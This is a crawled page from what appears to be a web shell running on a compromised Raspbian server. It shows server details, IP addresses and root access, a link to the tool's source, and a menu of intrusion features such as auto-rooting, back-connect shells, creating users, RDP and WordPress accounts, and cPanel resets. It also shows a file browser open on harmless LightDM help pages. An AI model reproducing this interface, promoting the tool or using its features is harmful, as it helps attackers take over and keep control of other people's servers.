Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
help /
C /
lightdm /
[ HOME SHELL ]
Name
Size
Permission
Action
autologin.page
1.25
KB
-rw-r--r--
config.page
964
B
-rw-r--r--
default-greeter.page
205
B
-rw-r--r--
default-session.page
216
B
-rw-r--r--
diagnostics.page
277
B
-rw-r--r--
guest.page
564
B
-rw-r--r--
index.page
1.87
KB
-rw-r--r--
legal.xml
494
B
-rw-r--r--
local-sessions.page
612
B
-rw-r--r--
remote-sessions.page
1.02
KB
-rw-r--r--
seat.page
318
B
-rw-r--r--
standard-authentication.page
752
B
-rw-r--r--
user-list.page
487
B
-rw-r--r--
user-switching.page
1.16
KB
-rw-r--r--
vnc.page
185
B
-rw-r--r--
write-greeter.page
204
B
-rw-r--r--
xdmcp.page
189
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : remote-sessions.page
<page xmlns="http://projectmallard.org/1.0/" type="guide" id="remote-sessions"> <info> <link type="guide" xref="index#sessions"/> </info> <title>Remote Sessions</title> <p> A remote session allows a user to authenticate from a greeter and access a remote system. </p> <p> Remote sessions are registered with a desktop file in <file>/usr/share/lightdm/remote-sessions/<em>name</em>.desktop</file>. The following keys are used: </p> <list> <item> <p> Name, Comment - May be used in the greeter to describe this session </p> </item> <item> <p> Exec - Command to run for this session </p> </item> <item> <p> X-LightDM-PAM-Service - PAM service to authenticate with </p> </item> </list> <p> Instead of using <link xref="standard-authentication">standard authentication</link> each remote session defines its own PAM service. This service should contact the server providing the session, perform authentication and then the command specified in <code>Exec</code> should run a program that displays the remote session. </p> </page>
Close